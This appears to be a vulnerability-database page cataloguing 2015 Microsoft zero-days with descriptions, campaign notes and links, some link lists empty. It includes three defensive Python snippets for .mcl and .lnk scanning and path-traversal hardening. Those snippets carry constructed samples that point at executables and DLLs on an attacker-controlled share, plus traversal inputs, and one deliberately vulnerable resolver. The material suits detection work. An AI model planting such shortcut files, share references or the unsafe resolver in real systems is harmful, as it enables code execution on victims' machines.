Zero-day vulnerabilities discovered: 18
Memory corruption
The vulnerability allows a local attacker to gain elevated privileges on the target system.
The vulnerability exists due to a boundary error when handling objects in kernel memory. A local attacker can run a specially crafted program, trigger memory corruption and gain SYSTEM privileges.
Successful exploitation of this vulnerability results in privilege escalation on the vulnerable system.
Note: the vulnerability was being actively exploited.
Software: Windows
Links:
https://www2.trustwave.com/rs/815-RFM-693/images/2016%20Trustwave%20Global%20Security%20Report.pdf
https://technet.microsoft.com/library/security/ms15-135
https://www.symantec.com/security_response/vulnerability.jsp?bid=78514
http://www.securityweek.com/microsoft-patches-windows-office-flaws-exploited-wild
Arbitrary code execution
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to improper handling of Media Center link (.mcl) files. A remote attacker can create a specially crafted .mcl file that references malicious code (for example an executable on an attacker-controlled network share), trick the victim into opening it and execute arbitrary code with the privileges of the current user.
Successful exploitation of this vulnerability results in system compromise.
Note: the vulnerability was being actively exploited.
This vulnerability is related to a previously unreported zero-day exploit discovered in the Hacking Team leaked emails. Trend Micro researchers (Aaron Luo, Kenney Lu, and Ziv Chang) discovered the exploit and subsequently reported their findings to Microsoft.
Software: Windows Media Center
Links:
https://www2.trustwave.com/rs/815-RFM-693/images/2016%20Trustwave%20Global%20Security%20Report.pdf
http://blog.trendmicro.com/trendlabs-security-intelligence/windows-media-center-hacking-team-bug-fix...
https://technet.microsoft.com/library/security/ms15-100
http://www.cio.com/article/2982358/microsoft-patches-yet-another-hacking-team-zero-day-exploit.html
http://resources.infosecinstitute.com/exploiting-ms15-100-cve-2015-2509/#gref
http://www.csoonline.com/article/2982487/vulnerabilities/microsoft-patches-yet-another-hacking-team-...
http://securityaffairs.co/wordpress/40019/hacking/windows-media-center-ht-bug.html
https://vulners.com/metasploit/MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS15_100_MCL_EXE
https://www.symantec.com/security_response/vulnerability.jsp?bid=76594
http://www.pcworld.com/article/2982361/microsoft-patches-yet-another-hacking-team-zero-day-exploit.h...
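A triage helper for the .mcl pattern described above, added here as an example; it is not code from Trend Micro, Microsoft or the Metasploit module linked above. It assumes the Media Center link format is XML whose <application> element carries a run= attribute naming the program Media Center launches (the pattern the public Metasploit module uses). The three sample documents are constructed for the example and are not real malware:

```python
import xml.etree.ElementTree as ET
from typing import List, Optional

# Constructed sample .mcl documents (not real malware). The second one points
# Media Center at an executable on an attacker-controlled UNC share, which is
# the CVE-2015-2509 pattern: Media Center launches whatever run= names.
BENIGN_MCL = '<application name="Weather" url="http://example.invalid/weather"/>'
MALICIOUS_MCL = r'<application name="Photos" run="\\10.0.0.5\share\update.exe"/>'
LOCAL_EXE_MCL = r'<application name="Calc" run="C:\Windows\System32\calc.exe"/>'

# Extensions that mean "run code" rather than "open media"
EXEC_EXTENSIONS = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif",
                   ".vbs", ".js", ".hta", ".ps1", ".msi", ".dll")


def _attr(elem: ET.Element, name: str) -> Optional[str]:
    """Case-insensitive attribute lookup (assumed: the format is not case-strict)."""
    for key, value in elem.attrib.items():
        if key.lower() == name:
            return value
    return None


def suspicious_run_targets(mcl_text: str) -> List[str]:
    """Return every run= target in an .mcl document that would launch code:
    anything on a UNC share, or anything with an executable extension.
    A malformed document yields an empty list; callers should still treat
    unparseable .mcl files from untrusted senders as suspicious."""
    try:
        root = ET.fromstring(mcl_text)
    except ET.ParseError:
        return []
    findings = []
    for elem in root.iter():
        if elem.tag.lower() != "application":
            continue
        run = _attr(elem, "run")
        if not run:
            continue
        target = run.strip().strip('"')
        lowered = target.lower()
        if lowered.startswith(("\\\\", "//")) or lowered.endswith(EXEC_EXTENSIONS):
            findings.append(target)
    return findings


def scan_mcl_file(path: str) -> List[str]:
    """Convenience wrapper for a file on disk (e.g. a mail-gateway quarantine)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return suspicious_run_targets(fh.read())
```

Flagging on run= alone is deliberately conservative: in a mail gateway, any .mcl attachment arriving from outside the organisation is worth quarantining outright, since Media Center has no legitimate reason to receive link files by e-mail.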
Memory corruption
The vulnerability allows a local attacker to gain elevated privileges on the target system.
The weakness exists due to a boundary error in the Win32k kernel-mode component (win32k.sys). A local attacker can run a specially crafted program, trigger memory corruption and gain SYSTEM privileges.
Successful exploitation of the vulnerability may result in full control of the vulnerable system.
Note: the vulnerability was being actively exploited.
The vulnerability was reported by FireEye researcher Wang Yu.
Software: Windows
Links:
https://technet.microsoft.com/en-us/library/security/ms15-097
https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf
https://www.symantec.com/security_response/vulnerability.jsp?bid=76608
https://krebsonsecurity.com/2015/09/microsoft-pushes-a-dozen-security-updates/
http://www.securityweek.com/microsoft-patches-windows-vulnerability-exploited-wild
https://www.scmagazine.com/microsoft-fixes-several-bugs-on-patch-tuesday-two-being-actively-exploite...
https://www.helpnetsecurity.com/2015/09/09/microsoft-pushes-out-security-updates-plugs-holes-activel...
https://threatpost.com/microsoft-patches-graphics-component-flaw-under-attack/114575/
http://www.securitynewspaper.com/2015/09/09/microsoft-patches-graphics-component-flaw-under-attack/
Memory corruption
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to a boundary error when parsing malformed images (Encapsulated PostScript, EPS). A remote attacker can create an Office document containing a specially crafted image, trick the victim into opening it, cause memory corruption and execute arbitrary code with the privileges of the current user.
Successful exploitation of this vulnerability results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
CVE-2015-2545 was reported to account for around 17% of attacks against Microsoft Office users.
Used to target organisations in China.
Software: Microsoft Office
Links:
https://technet.microsoft.com/en-us/library/security/ms15-099
https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf
http://pwc.blogs.com/cyber_security_updates/2016/05/exploring-cve-2015-2545-and-its-users.html
https://threatpost.com/apt-groups-finding-success-with-patched-microsoft-flaw/118298/
http://www.securityweek.com/year-old-office-vulnerabilities-most-popular-current-attacks
https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/
https://www.symantec.com/security_response/vulnerability.jsp?bid=76667
https://blogs.sophos.com/2016/07/18/cybercriminals-shift-their-tactics-for-microsoft-office-document...
https://www.threatconnect.com/blog/word-document-trojan-exploiting-cve/
http://www.itworldcanada.com/article/exploit-kits-now-adopting-recent-office-vulnerabilities-report/...
https://www.scmagazine.com/microsoft-fixes-several-bugs-on-patch-tuesday-two-being-actively-exploite...
http://blog.morphisec.com/exploit-bypass-emet-cve-2015-2545
http://news.softpedia.com/news/one-microsoft-office-exploit-has-become-very-popular-with-cyber-espio...
http://news.softpedia.com/news/ke3chang-is-back-and-it-s-targeting-indian-embassies-around-the-globe...
Memory corruption
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The weakness exists due to a boundary error when handling JavaScript and HTML tables within the layout cache. A remote attacker can create a specially crafted web site, trick the victim into visiting it, trigger memory corruption and execute arbitrary code with the privileges of the current user.
Successful exploitation results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
The vulnerability was exploited in a watering-hole attack via a compromised website belonging to an evangelical church in Hong Kong, delivering the Korplug (PlugX) malware.
Software: Microsoft Internet Explorer
Known/famous malware:
Korplug (PlugX).
Links:
https://technet.microsoft.com/library/security/MS15-093
http://www.securityweek.com/microsoft-issues-emergency-patch-critical-ie-flaw-exploited-wild
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28195
https://www.alienvault.com/blogs/security-essentials/internet-explorer-memory-corruption-vulnerabili...
https://www.tripwire.com/state-of-security/vulnerability-management/ie-under-attack-microsoft-releas...
https://krebsonsecurity.com/2015/08/microsoft-pushes-emergency-patch-for-ie/
https://www.redpacketsecurity.com/cve-2015-2502-microsoft-issues-emergency-patch-for-all-versions-of...
https://blog.qualys.com/laws-of-vulnerabilities/2015/08/18/ms15-093--oob-fix-for-internet-explorer
https://arstechnica.com/security/2015/08/microsoft-issues-emergency-patch-for-critical-ie-bug-under-...
https://www.scmagazine.com/microsoft-patches-critical-remote-code-execution-bug-in-internet-explorer...
https://www.symantec.com/connect/tr/blogs/new-internet-explorer-zero-day-exploited-hong-kong-attacks
https://malwarelist.net/tag/zero-day-vulnerability/
http://www.darkreading.com/attacks-breaches/ie-bug-exploited-in-wild-after-microsoft-releases-out-of...
http://thehackernews.com/2015/08/microsoft-emergency-patch-zero-day-internet-explorer.html
Memory corruption
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to a use-after-free (CTaskSymbol) when processing Microsoft Office documents. A remote unauthenticated attacker can create a specially crafted Office document, trick the victim into opening it and execute arbitrary code on the target system with the privileges of the current user.
Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.
Note: this vulnerability was being actively exploited.
The vulnerability was discovered by Yong Chuan Koh of MWR Labs.
Software: Microsoft Office
Links:
https://technet.microsoft.com/en-us/library/security/ms15-081.aspx
https://www.symantec.com/security_response/vulnerability.jsp?bid=76200
https://www.nccgroup.trust/uk/our-research/understanding-microsoft-word-ole-exploit-primitives/
https://labs.mwrinfosecurity.com/advisories/microsoft-office-ctasksymbol-use-after-free-vulnerabilit...
http://blog.trendmicro.com/trendlabs-security-intelligence/august-patch-tuesday-includes-update-for-....
Privilege escalation
The vulnerability allows a local attacker to gain elevated privileges on the target system.
The vulnerability exists because Mount Manager does not properly process symbolic links. An attacker who can insert a specially crafted USB device into the system can create arbitrary files and execute malicious code with SYSTEM privileges.
Successful exploitation of this vulnerability may result in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited, in limited, targeted attacks.
The USB-borne infections at the Natanz uranium enrichment facility in Iran (Stuxnet) and the Equation Group's Fanny worm, uncovered by researchers at Kaspersky Lab, exploited a different shortcut-handling flaw, the .LNK vulnerability CVE-2010-2568 (MS10-046, revisited under CVE-2015-0096 below), not this Mount Manager issue.
Software: Windows
Links:
https://technet.microsoft.com/en-us/library/security/ms15-085.aspx
https://blogs.technet.microsoft.com/srd/2015/08/11/defending-against-cve-2015-1769-a-logical-issue-e...
https://cdn4.esetstatic.com/eset/US/resources/docs/white-papers/Windows_Exploitation_in_2015.pdf
https://threatpost.com/microsoft-patches-usb-related-flaw-used-in-targeted-attacks/114240/
https://threats.kaspersky.com/en/vulnerability/KLA10646/
https://www.sophos.com/en-us/threat-center/threat-analyses/vulnerabilities/VET-000786.aspx
http://www.securityweek.com/microsoft-adobe-patch-dozens-security-vulnerabilities
Buffer overflow
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to a buffer overflow in the Windows Adobe Type Manager Library (ATMFD.dll) when processing OpenType fonts. A remote attacker can create a specially crafted document or web page with an embedded malicious OpenType font, trick the victim into opening it, cause memory corruption and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.
Note: the vulnerability was being actively exploited.
The exploit code was revealed in the Hacking Team data leak.
The vulnerability was reported by FireEye's Genwei Jiang and Google Project Zero's Mateusz Jurczyk.
The exploit is reported to have been developed by Eugene Ching of Qavar Security and sold to Hacking Team in January 2015.
Software: Windows
Links:
Memory corruption
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The weakness exists due to a boundary error in Internet Explorer. A remote attacker can create a specially crafted web site, trick the victim into visiting it, trigger memory corruption and execute arbitrary code with the privileges of the current user.
Successful exploitation of the vulnerability results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
The exploit code was revealed in the Hacking Team data leak.
Software: Microsoft Internet Explorer
Links:
Memory corruption
The vulnerability allows a local attacker to gain elevated privileges on the target system.
The weakness exists due to a boundary error in the Adobe Type Manager font driver (ATMFD.dll). A local attacker can run a specially crafted application, trigger memory corruption, bypass OS-level sandboxing and execute arbitrary code with SYSTEM privileges.
Successful exploitation of the vulnerability results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
Public exploit code for this vulnerability became available as part of the Hacking Team leak on July 5, 2015.
Software: Windows
Links:
https://technet.microsoft.com/en-us/library/security/ms15-077.aspx
http://blog.trendmicro.com/trendlabs-security-intelligence/a-look-at-the-open-type-font-manager-vuln...
http://www.securityweek.com/microsoft-patches-hacking-team-zero-days-other-vulnerabilities
https://countuponsecurity.com/2015/07/24/hacking-team-arsenal-of-cyber-weapons/
https://securingtomorrow.mcafee.com/business/security-connected/microsoft-patch-tuesday-july-2015/
http://www.bankinfosecurity.com/hacking-team-dump-windows-zero-day-a-8404
https://www.secureworks.com/blog/targeted-exploit-and-escalation
Heap-based buffer overflow
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to heap-based buffer overflow when processing Office files. A remote attacker can create a specially crafted Office file, trick the victim into opening it, cause memory corruption and execute arbitrary code with privileges of the current user.
Successful exploitation of this vulnerability results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
The vulnerability was used in a cyber-espionage campaign by Tsar Team, the group also tracked as APT28 and associated with Operation Pawn Storm.
Software: Microsoft Office
Known/famous malware:
Trojan.Win32.Sofacy.
Links:
https://technet.microsoft.com/en-us/library/security/ms15-070.aspx
http://resources.infosecinstitute.com/the-shadow-of-the-russian-cyber-army-behind-the-2016-president...
https://www.trustwave.com/Resources/SpiderLabs-Blog/Tsar-Team-Microsoft-Office-Zero-Day-CVE-2015-242...
https://www.symantec.com/security_response/vulnerability.jsp?bid=75744
http://www.securityweek.com/microsoft-patches-office-zero-day-bug-used-apt-group
Memory corruption
The vulnerability allows a local attacker to obtain elevated privileges on the target system.
The weakness exists due to a memory-corruption error in the Win32k kernel-mode driver (win32k.sys); it is tracked as CVE-2015-2360.
Exploited by Duqu 2.0 and used in the attack on Kaspersky Lab's internal network in early spring 2015.
Software: Windows
Links:
https://technet.microsoft.com/en-us/library/security/ms15-061.aspx
https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-ac...
http://securityaffairs.co/wordpress/37714/cyber-crime/duqu-2-0-hit-kaspersky.html
http://blog.trendmicro.com/trendlabs-security-intelligence/analysis-of-cve-2015-2360-duqu-2-0-zero-d...
https://www.symantec.com/security_response/vulnerability.jsp?bid=75025
http://blog.ensilo.com/ms-patch-tuesday-a-look-into-4-vulnerabilities-in-the-windows-kernel
https://www.virusbulletin.com/conference/vb2015/abstracts/duqu-2-0-win32k-exploit-analysis/
http://usa.kaspersky.com/about-us/press-center/press-releases/2015/duqu-back-kaspersky-lab-reveals-c..
https://blogs.bromium.com/2015/06/16/duqu-2-0-whos-the-lord-of-ring0/
Privilege escalation
The vulnerability allows a local attacker to gain elevated privileges on the target system.
The weakness exists due to improper access control in the Win32k kernel-mode driver. A local attacker can run a specially crafted application that abuses a user-mode callback to copy the SYSTEM process token into its own process and execute arbitrary code with SYSTEM privileges.
Successful exploitation of the vulnerability may result in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited. It was chained with the Adobe Flash vulnerability CVE-2015-3043 in Operation "RussianDoll".
Exploited by Russia's APT28 (Fancy Bear) in a cyber-espionage campaign against U.S. defense contractors, European security companies and Eastern European government entities.
Software: Windows
Links:
https://technet.microsoft.com/en-us/library/security/ms15-051
https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html http://resources.infosecinstitute.com/the-shadow-of-the-russian-cyber-army-behind-the-2016-president...
http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-cve-2015-1701-a-win32k-elevatio...
https://www.symantec.com/security_response/vulnerability.jsp?bid=74245
https://www.reddit.com/r/microsoft/comments/334zyo/russia_use_unpatched_cve20151701_in/
https://thehacktimes.com/cyber-espionage-operation-russian-doll/
http://www.eweek.com/security/russian-based-attackers-use-two-zero-days-in-one-attack.html
Memory corruption
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The weakness exists due to a boundary error when handling Rich Text Format files. A remote attacker can create a specially crafted RTF document, trick the victim into opening it, trigger memory corruption and execute arbitrary code with the privileges of the current user.
Successful exploitation results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
CVE-2015-1641 was reported to account for nearly 66% of attacks using Word documents.
Used in APT attacks targeting Tibetans, Uyghurs, human-rights groups in Taiwan and Hong Kong, and journalists.
Software: Microsoft Office
Links:
https://technet.microsoft.com/en-us/library/security/ms15-033.aspx
http://www.securityweek.com/year-old-office-vulnerabilities-most-popular-current-attacks
https://degsew.wordpress.com/2016/03/28/new-microst-office-word-2007-2013-exploit-cve-2015-1641-anal...
http://news.softpedia.com/news/cve-2015-1641-and-cve-2015-2545-are-today-s-most-popular-microsoft-wo...
http://www.securityweek.com/spear-phishing-attacks-target-industrial-firms-kaspersky-lab-ics-cert
http://www.securitynewspaper.com/2016/07/19/cve-2015-1641-cve-2015-2545-todays-popular-microsoft-wor...
Insecure DLL library loading
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to the way Microsoft Windows parses shortcut (.LNK) files. A remote attacker can place a specially crafted .dll file together with a shortcut that references it on a remote SMB or WebDAV share (or a removable drive), trick the victim into browsing to that location in Windows Explorer, and execute arbitrary code on the target system with the privileges of the current user; the DLL is loaded while Explorer renders the shortcut's icon, without the shortcut itself being opened.
Successful exploitation of the vulnerability may allow an attacker to compromise the vulnerable system.
Note: the vulnerability was being actively exploited.
According to Trustwave it is a zero-day.
CVE-2015-0096 is a continuation of CVE-2010-2568, which was believed to have been patched by MS10-046. That fix was incomplete, and the issue was addressed again in MS15-020. At the time of the patch release there were fully functional exploits for this vulnerability.
Software: Windows
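A heuristic scanner for the shortcut-based DLL planting described above, added here as an example and not code from Microsoft or Trustwave. It validates the MS-SHLLINK header (HeaderSize 0x4C and the fixed LinkCLSID) and then looks for DLL path references in the shortcut's ASCII and UTF-16LE strings, rating a DLL on a UNC share as high severity. It is a string-level triage tool, not a full shell-item parser; the two sample shortcuts are constructed inline for the example:

```python
import re
import struct
from typing import Dict, List, Tuple

LNK_HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046, as laid out on disk (MS-SHLLINK 2.1)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x00000001  # LinkFlags bit A

# UNC path ending in .dll, or drive-letter path ending in .dll
DLL_REF = re.compile(r'(\\\\[^\\"\s]+(?:\\[^\\"]+)+\.dll|[A-Za-z]:\\[^"]*?\.dll)', re.IGNORECASE)


def is_lnk(data: bytes) -> bool:
    """Header check: HeaderSize == 0x4C and the fixed LinkCLSID."""
    return (len(data) >= LNK_HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def link_flags(data: bytes) -> int:
    return struct.unpack_from("<I", data, 0x14)[0]


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Printable ASCII runs plus UTF-16LE runs (shell items store paths in both)."""
    found = [m.group().decode("ascii")
             for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]
    found += [m.group().decode("utf-16le")
              for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)]
    return found


def dll_references(data: bytes) -> List[Tuple[str, str]]:
    """(path, severity) for every DLL path in the blob. A DLL on a UNC share is the
    remote-share planting pattern and is rated high; a local DLL path is medium."""
    refs = []
    for s in extract_strings(data):
        for m in DLL_REF.finditer(s):
            path = m.group(0)
            refs.append((path, "high" if path.startswith("\\\\") else "medium"))
    return refs


def assess_lnk(data: bytes) -> Dict[str, object]:
    """Verdict for one file's bytes: not a shortcut, benign, or suspicious."""
    if not is_lnk(data):
        return {"is_lnk": False, "has_idlist": False, "dll_refs": [], "suspicious": False}
    refs = dll_references(data)
    return {
        "is_lnk": True,
        "has_idlist": bool(link_flags(data) & HAS_LINK_TARGET_ID_LIST),
        "dll_refs": refs,
        "suspicious": any(sev == "high" for _, sev in refs),
    }


def _fake_lnk(target: str) -> bytes:
    """Constructed sample: a valid header (HasLinkTargetIDList set) followed by a
    UTF-16LE target string. Real shortcuts wrap the target in shell-item structures;
    the scanner only needs the strings, so the sample omits them."""
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", HAS_LINK_TARGET_ID_LIST)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))
    return header + target.encode("utf-16le")


BENIGN_LNK = _fake_lnk(r"C:\Program Files\App\app.exe")
PLANTED_DLL_LNK = _fake_lnk(r"\\10.0.0.5\share\evil.dll")
```

Shortcuts that legitimately reference a DLL (control-panel applets under %SystemRoot%) show up as medium; the high rating is reserved for the remote-share case the exploits used, so a high hit on a removable drive or in an e-mail attachment is worth escalating.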
Security bypass
The vulnerability allows a remote attacker to bypass security restrictions (ASLR) on the target system.
Allegedly, Chinese hackers combined it with a remote code execution vulnerability in Adobe Flash to infect visitors to the Forbes website with malware from November 2014.
Software: Microsoft Internet Explorer
Known/famous malware:
JS:CVE-2015-0071-A.
Links:
https://technet.microsoft.com/library/security/ms15-009
https://cdn4.esetstatic.com/eset/US/resources/docs/white-papers/Windows_Exploitation_in_2015.pdf
https://www.symantec.com/security_response/vulnerability.jsp?bid=72455
http://blog.trendmicro.com/trendlabs-security-intelligence/bypassing-aslr-with-cve-2015-0071-an-out-...
https://www.invincea.com/2015/02/chinese-espionage-campaign-compromises-forbes/
http://www.theregister.co.uk/2015/02/10/patch_tuesday_release_fixes_unprecedented_zeroday_design_fla...
https://www.hackread.com/hackers-use-flash-and-ie-to-target-forbes-visitors/
https://arstechnica.com/security/2015/02/pwned-in-7-seconds-hackers-use-flash-and-ie-to-target-forbe...
http://www.securityweek.com/microsoft-patches-critical-windows-internet-explorer-vulnerabilities-pat...
http://www.threatgeek.com/2016/05/turbo-twist-two-64-bit-derusbi-strains-converge.html
https://www.scmagazine.com/forbescom-attackers-exploited-zero-days-in-flash-ie/article/536348/
Cross-site scripting
The vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.
CVE-2015-0072 was apparently reported to Microsoft on October 13, 2014, but David Leo disclosed its details on the Full Disclosure security mailing list on January 31, 2015.
Software: Microsoft Internet Explorer
Known/famous malware:
Exploit: HTML/CVE-2015-0072.A
Links:
https://technet.microsoft.com/library/security/ms15-018
http://www.pcworld.com/article/2879372/dangerous-ie-vulnerability-opens-door-to-powerful-phishing-at...
https://nakedsecurity.sophos.com/2015/02/04/internet-explorer-has-a-cross-site-scripting-zero-day-bu...
https://blogs.forcepoint.com/security-labs/another-day-another-zero-day-%E2%80%93-internet-explorers...
http://22by7.helpserve.com/News/NewsItem/View/5773/another-day-another-zero-day--internet-explorers-...
Path traversal
The vulnerability allows a remote attacker to gain elevated privileges on the target system.
The weakness exists due to insufficient validation of user-supplied paths (directory traversal) in the TS WebProxy (TSWbPrxy.exe) Windows component. An attacker who already has code execution inside the Internet Explorer sandbox, for example via a separate browser exploit, can abuse it to place a file outside the sandbox and run it with the privileges of the current user, escaping Enhanced Protected Mode.
Successful exploitation of the vulnerability may result in compromise of the vulnerable system with the privileges of the current user.
Note: the vulnerability was being actively exploited.
The vulnerability was used in the CNACOM campaign targeting a government organisation in Taiwan.
Software: Windows
Known/famous malware:
Exploit.Win32.CVE-2015-0016.
Links:
https://technet.microsoft.com/library/security/ms15-004
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explo...
https://www.symantec.com/security_response/vulnerability.jsp?bid=71965
http://www.securityweek.com/china-linked-spies-target-taiwan-ie-exploit
http://securityaffairs.co/wordpress/33153/cyber-crime/fessleak-malvertising-campaign.html
http://securityaffairs.co/wordpress/54093/intelligence/cnacom-campaign.html
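The path-traversal class behind this sandbox escape, shown as an added example in Python; this is not Microsoft's TS WebProxy code, whose internals are not on this page. The vulnerable pattern joins an attacker-controlled name onto a base directory, so ".." segments walk out of it; the hardened version normalises separators, rejects absolute, drive-letter and UNC forms up front, resolves the result and refuses anything whose real path is outside the base. The base directory is an assumed value, and paths are POSIX-style for portability with Windows separators normalised before the check:

```python
import os
from typing import Optional

SANDBOX_DIR = "/srv/sandbox"  # assumed base directory for the example


def unsafe_resolve(base_dir: str, user_path: str) -> str:
    """Vulnerable pattern: trusts the supplied name. '..' segments walk out of
    base_dir, so the caller ends up reading, writing or executing elsewhere."""
    return os.path.normpath(os.path.join(base_dir, user_path))


def safe_resolve(base_dir: str, user_path: str) -> Optional[str]:
    """Hardened version. Returns the resolved path when it lies inside base_dir,
    None for anything that would land outside it (or cannot be checked)."""
    base = os.path.realpath(base_dir)
    normalised = user_path.replace("\\", "/")          # treat Windows separators as separators
    if (not normalised
            or "\x00" in normalised                    # NUL truncation tricks
            or normalised.startswith("/")              # absolute or UNC (// after normalisation)
            or normalised[1:2] == ":"):                # C: drive prefix
        return None
    candidate = os.path.realpath(os.path.join(base, normalised))
    try:
        # realpath on both sides defeats '..' and symlink games; commonpath, unlike
        # a startswith() prefix test, does not accept /srv/sandbox2 for /srv/sandbox
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:                                 # different drives, mixed abs/rel
        inside = False
    return candidate if inside else None


def compare(user_path: str) -> dict:
    """Side-by-side result for one input, for reading the difference at a glance."""
    return {"input": user_path,
            "unsafe": unsafe_resolve(SANDBOX_DIR, user_path),
            "safe": safe_resolve(SANDBOX_DIR, user_path)}


if __name__ == "__main__":
    for sample in ("files/report.pdf",
                   r"..\..\Windows\System32\cmd.exe",
                   "../../Windows/System32/cmd.exe",
                   r"C:\Windows\System32\cmd.exe",
                   r"\\10.0.0.5\share\payload.exe"):
        print(compare(sample))
```

The containment check is done on the resolved path rather than on the string the caller supplied, which is what a traversal fix has to do: string-level filtering of ".." misses encodings, mixed separators and symlinks, whereas realpath plus commonpath answers the only question that matters, where the access would actually land.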